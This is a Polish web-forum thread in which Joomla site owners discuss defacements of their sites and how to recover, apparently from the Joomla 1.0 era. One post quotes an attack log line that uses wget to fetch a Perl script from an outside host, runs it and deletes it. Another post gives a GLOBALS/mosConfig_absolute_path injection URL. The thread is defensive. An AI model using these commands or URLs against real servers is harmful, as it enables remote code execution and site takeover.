Joomla dziurawa jak durszlak :-/

[rkubera]

JA też się spotkałem z turkami na jednej z moich stron. Joomla 1.03 bez CB .Niżej log z ataku , podmieniono plik konfiguracyjny oraz pare innych plików.

Środek naprawczy wykasowanie wszystkiego i przywrócenie danych z kopi zapasowej.
Do pliku .htaccess dopisane w celu blokady tego IP
Po adresie www.mischel.cz wygląda to na czeskich turków

Z logów które przysłałeś to wynika że atak nastąpił przez podmianę globals i komponent com_content....
Polegał on chyba na tym,
że podmienili Ci pliki funcją wget po wywołaniu jej przez cmd z Twojego serwera.
Czyli nie pospuli bazy a tylko popodmieniali pliki tak?
to siedzi tu:
wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;
rm%20-rf%20mambo.*

tylko zamiast %20 zamień na spacje....
Sprawdzę to dziś wieczorem, bo spawa dosyć istotna - nawet chyba admina ani wejścia do backendu nie trzeba ...

[Rybik]

Bardzo prosze podac pozniej (o ile sie da) rozwiazanie w formie ogolnej, tzn jakie elementy, ustawienia serwera, chmody, czy co tam jeszcze moze byc istotne sa powodem powstawania takiej furtki.


No i oczywiscie kto ma , niech podaje numery IP

[stone]

Ukazała się krytyczna łatka do CB, szczegóły tutaj http://www.joomlapolis.com/

[rkubera]

No cóż, próbowałem, ale u mnie nie przeszło.
Położyłsię już na globals:
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=blebleble

Mam register_globals na off i załadowany mod_security.
Pozdrawiam.

P.S. Problem z CB też jest w przypadku włączonych globalsów....

[viper]

@rkubera
oprucz pliku konfiguracyjnego pozmieniali pare innych , bo po wgraniu pliku konfiguracyjnego dalej strona wyświetlała co innego niż miało to być. Nie mam tego przy sobie bo zrzut mam na innym kompie więc nic więcej nie podam w tej sprawie. Chmody konfigu miałem ok ale i tak to obeszli.

[rkubera]

Tak,
bo zrobili to tak:
- wgrali Ci na serwer skrypt napisany w perlu
- wykonali go (on mógł też pozmieniać chmody)
- i wyczyścili się

Ale mam wrażenie, że ten serwer czeski (http://www.mischel.cz/) musiał być w to zamieszany bo
tam znajdował się ten perlowy skrypt.... Chyba że najpiwerw włamali się do nich.
Tak czy inaczej wget wskazuje na ich serwer...

[viper]

@rkubera
oprucz pliku konfiguracyjnego pozmieniali pare innych , bo po wgraniu pliku konfiguracyjnego dalej strona wyświetlała co innego niż miało to być. Nie mam tego przy sobie bo zrzut mam na innym kompie więc nic więcej nie podam w tej sprawie. Chmody konfigu miałem ok ale i tak to obeszli.

[Sova]

Heh... mnie też nie ominęło - a myślałem, ze miło wakacje spędzę. Nie wiem jeszcze jak i skąd nastąpił włam - wakacje poza domkiem (a hasełko do bazy się kłania). Jedynym fartem było to, że był backup 2 dni wczesniej
.
Co zepsuli?

Na szczęście jedynie index.php - wyczyszczony do cna i wstawiony text: "Hacked by CyberLord"

Specyfikacja serwisu:
Joomla 1.0.8
--------------------
KOMPONENTY:
-AkoBook
-ArtBanners
-Bookmarks
-JCE
-Generator mapy Google
-Graphitory
-Imagelinks
-Joomap
-Joomlaxlporer
-Recommend
-Remository
-SimpleFAQ
-Reszta jak w standardzie

I jak sie dostał/li ?
Więcej info wkrótce-czyli zaraz jak skończę urlop...

[rkubera]

Polecam:
http://forum.joomla.org/index.php?to...prev_next=next

Jeżeli to ten sam włam... Masz logi z apache?

[Sova]

No to chyba wiem jak się dostali... Remository. Z panelu admina nie mogę się dostać, popatrzyłem ftp'em i faktycznie - ostatnia edycja administator/components/com_remository oczywiście z dnia włamu.
-----------------------
Takie pytanko na szybko (tak ja wspominałem, siedzę na urlopie i nie mam zbyt często dostępu do netu, aby znaleźć co potrzeba):
Aby zaktualizować Remository do najnowszej wersji należy odinstalować obecną wersję i wgrać nową, czy wystarczy w celu aktualizacji tylko nadpisać pliki?
Wdzięczny będę - dzięki!